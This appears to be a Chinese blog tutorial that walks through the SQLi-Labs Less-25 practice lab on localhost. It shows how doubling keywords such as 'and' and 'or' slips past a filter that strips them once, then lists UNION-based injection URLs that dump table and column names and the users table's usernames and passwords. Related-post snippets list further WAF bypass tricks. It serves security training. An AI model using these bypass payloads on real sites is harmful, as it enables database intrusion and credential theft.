WAF绕过

已于 2022-02-19 17:26:54 修改
阅读量1.9k 收藏 8
点赞数 4
分类专栏: SQL注入 文章标签: web安全 SQL注入
于 2022-02-19 11:43:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123015801
版权

实验原理

WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入,跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。
作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行我们的查询了。

1.访问SQLi-Labs网站

访问Less-25,并根据网页提示给定一个GET参数

 2.寻找注入点及判断WAF过滤的关键字

http://127.0.0.1/sqli-labs/Less-25/?id=1'

运行后报错! 

http://127.0.0.1/sqli-labs/Less-25/?id=1' and '1'='1

 运行后页面显示的并不是id=1的用户名和密码,且提示原本输入的payload中"and"被删除了!

 同理,经过尝试,payload中的"or"也会被删除。

http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd '1'='1

 运行后正常显示id=1的用户名和密码,虽然原本输入的payload 中"and"被删除,但只删除一次!

http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd '1'='2

 运行后未正常显示!

由上述结果可以判断,网站存在字符型注入点,且WAF对"and"、"“"or"关键字进行过滤,但只过滤一次。
因此,在后续的注入步骤中,payload中只要存在"and"、"or"这样的固定字符串,
都需要使用重写方式绕过WAF的过滤。

3.判断网站查询的字段数

http://127.0.0.1/sqli-labs/Less-25/?id=1' oorrder by 1 --+

 注意:“order”当中含有“or”,因此也需要重写,即"oorrder”

正常显示!

...

...

最后,网站查询的字段数为3

 4.判断网站回显位置

http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd 1=2 union select 1,2,3 --+

结果是2号位3号位可以回显

5.获取网站当前所在数据库库名

 

显示为security

6.获取数据库security的全部表名

http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd 1=2 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

注意:“information”当中含有“or”,因此也需要重写,即infoorrmation”

 显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息

7.获取users表的全部字段名

http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd 1=2 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' anandd table_name='users' --+

8.获取users表id、username和password字段的全部值

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

1)显示第一组数据

 http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd 1=2 union select 1,2,concat_ws(',',id,username,passwoorrd) from security.users limit 0,1 --+

 2)显示第二组数据

 http://127.0.0.1/sqli-labs/Less-25/?id=1' anandd 1=2 union select 1,2,concat_ws(',',id,username,passwoorrd) from security.users limit 1,1 --+

 以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。

Z_l123
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF详解及WAF绕过
赤赤三的博客
03-20 8787
wafweb application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
搭建漏洞环境及实操
zzzzzzcq的博客
04-07 380
什么是WAFWEB应用防火墙 (Web Application Firewall) 定义:通过执行一系列针对HTTP/HTTPS的安全策略来防御对Web应用的攻击。 WAF绕过方法 1. 大小写混合 在规则匹配时只针对了特定大写或特定小写的情况,在实战中可以通过混合大小写的方式进行绕过(现在几乎没有这样的情况),如下所示。 uNion sElEct 1,2,3,4,5 2.URL编码 极少部分的 WAF 不会对普通字符进行 URL 解码,如下所示。union select 1,2,3,4,...
WAF绕过思路
永远是少年
03-12 3525
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
46、47-绕过WAFWeb应用程序防火墙)--介绍、主要功能、部署模式、分类及注入绕过方式等
最新发布
XLbb的博客
06-03 1474
网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全;IP黑白名单功能允许用户设置个性化的IP信任列表,直接屏蔽或者允许指定IP访问网站。同时,增加iP临时黑名单功能,以及实现了针对某个功能的iP白名单功能。同时,爬虫白名单提供爬虫信任机制,在出现误拦截情况下,允许用户自定义爬虫信任。
WAF的识别、检测、绕过原理与实战案例
weixin_64392888的博客
05-24 569
因此,组织需要不断更新和优化WAF的规则库,加强WAF的配置管理,并结合其他安全措施,如入侵检测系统(IDS)、入侵防御系统(IPS)等,构建多层次的网络安全防护体系。同时,安全团队应定期进行安全培训,提高对WAF绕过技术的认识,并进行实战演练,以提高应对复杂攻击的能力。攻击者利用已知的Web应用漏洞,轻易绕过WAF的防护,获取了网站的敏感信息。尽管WAF采用了RASP技术,但由于RASP的检测逻辑存在局限性,攻击者通过构造复杂的攻击向量,成功绕过WAF的检测。WAF的识别、检测、绕过原理与实战案例。
WAF绕过总结+工具介绍
kali_Ma的博客
09-24 9941
什么是WAF Wafweb应用防火墙( Web Application Firewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf( ModSecurity)、代码级wafWAF的原理 waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
长亭waf绕过1.pdf
07-09
长亭waf绕过1
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
WAF绕过技术 - cracer_CSDN
m0_67888657的博客
07-14 58
比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。123的时候页面是正确的,我们现在在盲猜hash的第一位,如果第一位等于0x42也就是B,那么strcmp结果为0,0+123=123,所以页面应该是正确的。过滤一次union后就会执行我们的查询了。比如对于上面这条查询,WAF过滤了一次union和select,那么我们在之前在写一个注释的语句,让他把注释里面的过滤掉,并不影响我们的查询。
第二章:遇到阻难!绕过WAF过滤
m0_51195235的博客
12-14 460
第二章:遇到阻难!绕过WAF过滤
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2073
针对WAF绕过
waf绕过
qq_38675102的博客
02-08 334
关于WebWaf的简单介绍与绕过技术
WAF是什么东西?!--- 3 waf绕过
WM_NNXX的博客
08-09 783
想法:waf绕过是门学问,记得sqlmap的使用有提到绕过waf的概念,输入数据的时候也要考虑到waf的影响,尤其是写一句话木马的时候,有的时候需要多次的嵌套来绕过waf的正则检测。听安全大佬们说,waf这东西对于渗透高手来说没啥卵用,形同虚设,但咱也不知道啊,咱也不敢问啊,可咱可以学啊,哈哈哈哈!!! ** 思想 ** 基本思想:是转换我们需要的请求,这样它对web应用程序仍然有效,但对WAF...
常见6种WAF绕过和防护原理
热门推荐
07-08 1万+
关于上传绕过WAF的姿势!
sql 注入 绕过 waf
3569
07-01 4249
https://notwhy.github.io/2018/06/sql-injection-fuck-waf/0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言  这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波...
绕过WAF单一方法
小刚的博客
04-30 1577
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 WAF绕过大法绕过WAF单一绕过方式1,一次URL编码绕过2,二次URL编码绕过3,其他编码4,空格过滤5,内联注释绕过6,大小写绕过7,双写关键字绕过8,宽字节绕过9,添加%绕过10,cookie注入11,请求方式差异规则松懈性绕过12,复参数绕过总结 绕过WAF 在我们进行sql注入的...
sql注入之——常用绕过waf方式
wsnbbz的博客
02-11 1866
1.参数污染 原理: 正则表达式一般只检测第一个参数,我们可以第一个参数放正常数据流量,第二个参数放攻击数据流量 语句 http://localhost/sqli-labs-master/Less-31/login.php/?id=1111&id=-1") union select 1,2,3-- - 可以看到第二个参数执行sql语句成功,但第一个参数不可以,我们之后在1,2,3处替换sq...
waf绕过cookie
08-09
WAF绕过Cookie主要是通过修改请求方式或使用复参数绕过的方法。其中,修改请求方式是最常见且典型的绕过方式。在一些ASP或ASPx网站中,WAF可能对GET请求进行了过滤,但对Cookie甚至POST参数没有进行检测。因此,攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值